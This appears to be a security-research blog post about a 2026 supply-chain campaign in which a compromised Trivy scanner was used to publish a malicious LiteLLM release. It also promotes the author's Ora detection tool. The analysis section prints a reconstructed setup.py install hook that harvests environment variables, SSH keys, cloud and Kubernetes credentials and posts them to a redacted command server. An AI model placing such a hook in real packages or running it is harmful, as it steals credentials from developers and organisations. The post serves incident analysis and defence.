The ScannerWas the Weapon

How TeamPCP turned a security tool into the master key for five package ecosystems — and what it means for every team deploying AI.

Founder, SPR{K3 Security Research

  • LiteLLM — an AI key proxy with 97M+ monthly downloads — was poisoned via a ghost release: a PyPI version with no GitHub source, no tag, no review trail
  • The attacker first compromised Trivy (a security scanner), used its CI credentials to poison LiteLLM — a second-order trust inversion
  • The malware fired on pip install — no import needed — harvesting SSH keys, cloud tokens, Kubernetes secrets, and every AI provider API key at once
  • Only detected because sloppy code caused RAM exhaustion. Clean malware would have run for months.
  • TeamPCP has announced more targets ahead
  • SPR{K}3’s existing behavioral_e5 already catches this; Ora v37.19.1 adds blast-radius scoring so the right findings get CRITICAL priority

There is a class of software whose compromise is categorically worse than ordinary supply chain attacks. Not because the code is more complex or the vulnerability more novel, but because of what the software holds. LiteLLM is a proxy that routes requests to OpenAI, Anthropic, Google, AWS, Azure, Cohere, Mistral, and a dozen other AI providers. Every API key, in one place, behind one package.

When an attacker poisons that package, they don’t steal one credential. They steal the entire organization’s AI infrastructure in a single pip install.

That is what happened in March 2026. And the attack chain, once you see the full sequence, is one of the most deliberately constructed pieces of malicious infrastructure we’ve analyzed. This is not simply a supply chain attack. It is a trust topology failure — a systematic exploitation of the way modern AI organizations have wired their dependency graphs and their security pipelines into the same trust surface.

97Mmonthly downloads

5ecosystems compromised

2wksfull campaign duration

The Kill Chain

TeamPCP did not start with LiteLLM. They started with Trivy.

Trivy is a security scanner. Organizations use it inside their CI/CD pipelines to scan container images, filesystems, and repositories for vulnerabilities. It runs with elevated permissions, has access to cloud credentials, registry tokens, and infrastructure secrets — because it needs them to do its job. It is trusted implicitly by every system that invokes it.

On March 19, 2026, TeamPCP compromised Trivy’s CI pipeline. This gave them the credentials that Trivy’s maintainers use to publish packages. From there, the chain unfolded precisely.

ATTACK SEQUENCE — TEAMPCP / LITELLM (MARCH 2026)

01Trivy CI compromised. The security scanner’s pipeline is breached. Publishing credentials exfiltrated. The scanner’s trust chain is now the attacker’s trust chain.

02LiteLLM CI poisoned. LiteLLM’s pipeline used Trivy for scanning. The stolen credentials unlock LiteLLM’s publishing infrastructure directly.

03Ghost release published to PyPI. A new LiteLLM version is uploaded — no GitHub tag, no source commit, no code review. It exists only as a binary in the registry.

04Payload fires on install. A startup hook executes the moment the package is installed. No import required. Stage 1: harvest SSH keys, cloud tokens, Kubernetes secrets, .env files, crypto wallets. Stage 2: deploy privileged containers. Stage 3: install persistent backdoor.

05Detected only by accident. Sloppy malware code exhausted system RAM. A developer noticed their machine dying, investigated, found LiteLLM had arrived as a transitive dependency of a Cursor MCP plugin they hadn’t knowingly installed.

  ATTACKER
      │
      ▼
  [ Trivy CI ]  ← security scanner, trusted by all pipelines
      │  credentials stolen
      ▼
  [ LiteLLM PyPI ]  ← ghost release, no GitHub source
      │  startup hook fires on pip install
      ▼
  [ Developer Machine ]  ← via Cursor MCP plugin (transitive dep)
      │
      ├── SSH private keys
      ├── .env / cloud tokens / IAM credentials
      ├── Kubernetes cluster secrets
      └── ALL AI provider API keys  ←  entire org blast radius

The campaign then extended to GitHub Actions, Docker Hub, npm, and Open VSX. Five ecosystems in two weeks — each breach providing credentials to unlock the next.

“The crash is the only reason thousands of companies aren’t fully exfiltrated right now. If the code had been cleaner, nobody notices for weeks. Maybe months.”

What Actually Ran on Your Machine

The malware payload executed through a startup hook — code Python runs automatically during package installation, before any application code, before any import statement, the moment pip install completes. The reconstructed pattern (simplified from incident reports) looked like this:

SETUP.PY — MALICIOUS STARTUP HOOK (RECONSTRUCTED)

import os, socket, base64, threading
try: import requests
except: pass

def _harvest():
    # Stage 1: collect everything of value
    data = {
        "env":  dict(os.environ),           # ALL env vars: API keys, tokens, secrets
        "host": socket.gethostname(),
    }
    # SSH keys, cloud credentials, kubeconfig, crypto wallets
    for path in [
        "~/.ssh/id_rsa", "~/.aws/credentials",
        "~/.kube/config", "~/.config/gcloud/credentials.db"
    ]:
        try:
            data[path] = open(os.path.expanduser(path), "rb").read()
        except: pass

    # Exfiltrate to C2 before any application code runs
    requests.post("https://[REDACTED C2]",
        data=base64.b64encode(str(data).encode()),
        timeout=5)

# Fires silently on install — no import, no user interaction
threading.Thread(target=_harvest, daemon=True).start()

# ↑ This thread had a memory leak.
# ↑ RAM exhaustion. Machine started dying. Developer noticed.
# ↑ The only reason this was discovered at all.

The critical property: os.environ at install time in a CI pipeline contains everything. The OPENAI_API_KEY, the ANTHROPIC_API_KEY, AWS access keys, GitHub deploy tokens, container registry passwords — all of it, dumped in a single dictionary, exfiltrated before a single line of application code ran. The hook didn’t need to know what keys you had. It took everything and sorted it out server-side.

Why os.environ is the entire game: Modern CI pipelines inject all secrets as environment variables to keep them out of code. The effect is to concentrate every credential an organization has into a single dictionary, readable by any package that loads at install time. The attacker doesn’t need to target your specific keys — they harvest the dictionary wholesale.

The Credential Aggregator Risk Class

Supply chain attacks are not new. What is new is the specific blast radius of AI infrastructure packages. A decade ago, a poisoned utility library might give an attacker execution on developer machines. The credentials at stake were limited.

The architecture of modern AI deployment has created a new category of target: the credential aggregator. LiteLLM is the canonical example, but the class includes any package whose entire purpose is routing requests between AI providers — holding every key in one place as a convenience feature. The feature that makes the product useful is exactly the feature that makes it catastrophic to compromise.

BLAST RADIUS — SINGLE COMPROMISED LITELLM INSTALL (CI PIPELINE)

One developer’s machine. One transitive dependency from a Cursor plugin. One CI run with org-wide secrets injected as environment variables.

  • ·All OpenAI API keys
  • ·All Anthropic keys
  • ·Google / Vertex AI keys
  • ·AWS IAM credentials
  • ·Azure OpenAI tokens
  • ·Kubernetes cluster access
  • ·Container registry push rights
  • ·GitHub deploy tokens

Estimated exposure: $50K–$500K in API spend abuse within 24 hours, plus full infrastructure access for persistent backdoor deployment. Dwell time if malware had been clean: weeks to months.

This is not credential theft at scale. It is a wholesale acquisition of an organization’s entire AI operations budget and infrastructure access, in a single pip install that nobody made a conscious decision to run.

THE TRANSITIVE DEPENDENCY PROBLEM

The developer who found this attack did not install LiteLLM. They installed a Cursor MCP plugin. That plugin had a dependency. That dependency had a dependency. LiteLLM arrived three layers deep, invisible, trusted by default because everything above it was trusted.

This is not a packaging bug. It is the designed behavior of a system optimized for convenience. Every AI agent, copilot, and internal tool built in the past two years carries a dependency tree nobody has fully audited. Credential aggregators are especially dangerous here because they naturally appear as transitive dependencies of anything that touches an AI provider.

The Ghost Release Pattern

The most technically significant aspect of this attack is not the malware payload. It is the delivery mechanism — and it deserves a formal name and definition, because it represents a detection gap that most supply chain tooling does not address.

ATTACK CLASS DEFINITION — SOURCE-DETACHED RELEASE

source-detached release (colloquially: ghost release) is a package version published to a distribution registry that has no verifiable correspondence to any source-controlled commit, tag, or reviewable artifact.

  • PRESENTVersion exists in PyPI registry
  • MISSINGNo matching Git tag in source repository
  • MISSINGNo commit hash in release metadata
  • MISSINGNo SBOM or artifact lineage record
  • MISSINGNo review trail — release cannot be diffed against any prior state
  • UNDETECTEDPasses all existing dependency scanners — they scan known code, not registry divergence

This is the attack vector that most supply chain security tools are blind to. Scanners that analyze repository code never see it. Hash verification only helps if you were already pinning to a hash. Trivy — the tool supposed to catch this — had been compromised. And even a clean Trivy would not have flagged a ghost release, because ghost releases are not a vulnerability class it was designed to detect.

ORA E33-AL — GHOST RELEASE DETECTION (CONCEPTUAL)

# Ghost release: exists in registry, absent from source
litellm==1.x.x  ✓  present in PyPI
litellm==1.x.x  ✗  no matching GitHub tag
litellm==1.x.x  ✗  no commit hash in release metadata
litellm==1.x.x  ✗  no source diff possible

# Detection: PyPI JSON API → project_urls.Source
# → GitHub tags API → if version has no tag → CRITICAL
# chain_sig: PyPI→NoTag→Unreviewed→StartupExec→Exfil

The ghost release pattern is independently publishable as a detection category. Organizations that want to protect against this class need one check that almost no CI pipeline currently performs: does this version of this package correspond to a reviewable source commit? For credential aggregators, this check should be mandatory before any install.

The Scanner as Transitive Trust Amplifier

Security teams add scanners to their CI pipelines to protect against supply chain attacks. The scanner is the defense. But a scanner that runs in CI has exactly the same properties as any other CI dependency: it needs credentials to function, it runs with elevated permissions, it is trusted implicitly by every pipeline that invokes it.

TeamPCP’s method was to attack the scanner first. Not because Trivy was the target, but because Trivy had access to the credentials needed to reach the next target. The security tool became the initial access vector for a second-order compromise that was invisible to any scanner-based defense.

But the danger goes further than stolen credentials. A scanner doesn’t just hold secrets — it propagates trust into downstream pipelines. When Trivy reports a package clean, that verdict flows into build systems, deployment gates, and developer workflows. Compromise the scanner, and you don’t just steal credentials. You rewrite the trust decisions of every pipeline that consumes its output.

The structural problem: Compromising a scanner doesn’t just expose credentials — it rewrites the trust decisions of every pipeline that consumes its output. A clean bill of health from a poisoned scanner is indistinguishable from a genuine one. You cannot use the scanner to detect the scanner’s own compromise. The defense eliminates itself.

The only stable solution is to treat your security tooling with the same adversarial skepticism you apply to any untrusted dependency. Hash-pin it, verify its source against published tags, and isolate its credential scope to the minimum required. The scanner in your CI is a credential store. Treat it accordingly.

What Ora Already Knew

When I analyzed this attack against SPR{K}3’s pattern database, the first thing I checked was whether our existing detection would have fired. The answer is yes — with a caveat that illuminates a problem most security tooling shares.

Ora’s behavioral_e5 engine detects exactly two pattern classes directly relevant here: malicious_setup.py_code_execution and unpinned_dependency. The first catches code that executes at install time via setup hooks. The second flags requirements files where high-risk packages aren’t pinned with hash verification. These patterns have 70 and 4,377 graph connections in our pattern dependency graph. The attack class was already mapped.

“The gap was not in detection. It was in triage prioritization.”

An unpinned_dependency finding on a random utility library and an unpinned_dependencyfinding on litellm looked identical in our output. Both were HIGH severity. Both got the same bounty estimate. The blast radius difference — orders of magnitude apart — was invisible to the scoring system.

WHAT V37.19.1 CHANGES

Ora v37.19.1 adds credential-aggregator blast-radius scoring as a post-processing pass. When a supply-chain execution pattern fires against a package in the credential aggregator class, the finding is automatically elevated to CRITICAL with R₀=2.1 — epidemic range in our biological scoring model — and the LiteLLM/TeamPCP chain signature.

ORA V37.19.1 — TAG 5: CREDENTIAL AGGREGATOR BLAST-RADIUS SCORING

# No new engine. No new patterns. Zero added scan time.
# behavioral_e5 already fires. We changed what it means.

if _is_supply_chain_exec_pattern(finding):
    if _is_credential_aggregator(finding):
        # litellm, openai, anthropic, langchain, boto3...
        finding['severity']    = 'CRITICAL'
        finding['darwin_r0']    = 2.1   # epidemic: each install exposes all provider keys
        finding['blast_radius'] = 'credential_aggregator'
        finding['chain_sig']    = 'PipInstall→CredentialAggregator→AllKeysCompromised'

    elif _is_security_tooling_ci(finding):
        # trivy, bandit, semgrep, checkov — scanner as CI dep
        finding['severity']    = 'HIGH'
        finding['darwin_r0']    = 1.6   # spreading: CI creds unlock next target
        finding['chain_sig']    = 'SecurityTool→CICredentials→2ndOrderPoison'

The attack class was already detected. We made the prioritization match the actual risk.

What Security Teams Should Do Now

IMMEDIATE ACTIONS

ACTIONWHYPRIORITY
Audit every MCP plugin installed in developer IDEs (Cursor, Copilot, Windsurf)LiteLLM arrived as a transitive dep of a plugin nobody knew they hadCritical
Hash-pin all AI SDK dependencies: --hash=sha256:<verified>Ghost releases bypass name+version checks entirelyCritical
Rotate all AI provider API keys nowAny CI env that ran during the exposure window is suspectCritical
Verify each PyPI version of security tooling against a source commitTrivy-class attack: scanner as initial access vectorHigh
Isolate scanner CI credentials from deploy credentialsTrivy had access to LiteLLM’s publish keys because they shared scopeHigh
Audit transitive dependency trees for all AI agent frameworksMost teams cannot name what’s 3 levels deep in their agent toolingMedium

THE STRUCTURAL ISSUE

The deeper problem is architectural. Organizations building AI products have optimized for deployment velocity. Dependency trees are often unknown to the teams that own them. A developer adding a Cursor plugin doesn’t think about what enters their Python environment — that’s not how we’ve trained people to reason about software installation.

Solving this requires treating the AI dependency layer as infrastructure. That means inventory, hash pinning, provenance verification, and explicit review of any package that holds or routes credentials. It is more friction than most teams want. It is less friction than recovering from a full credential compromise.

TeamPCP posted on Telegram after the incident: “many of your favourite security tools and open-source projects will be targeted in the months to come.” The pattern — identify a trusted tool with CI credentials, compromise it, use its credentials to reach the next target — is repeatable indefinitely. Every security scanner and every credential proxy in a CI pipeline is now a valid initial access vector for an attacker who has understood this method.

In 2026, the attack surface
is not your code.
It is your trust.

Published by:

Unknown's avatar

Dan D. Aridor

I hold an MBA from Columbia Business School (1994) and a BA in Economics and Business Management from Bar-Ilan University (1991). Previously, I served as a Lieutenant Colonel (reserve) in the Israeli Intelligence Corps. Additionally, I have extensive experience managing various R&D projects across diverse technological fields. In 2024, I founded INGA314.com, a platform dedicated to providing professional scientific consultations and analytical insights. I am passionate about history and science fiction, and I occasionally write about these topics.

Categories כלליTags , , , , Leave a comment

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.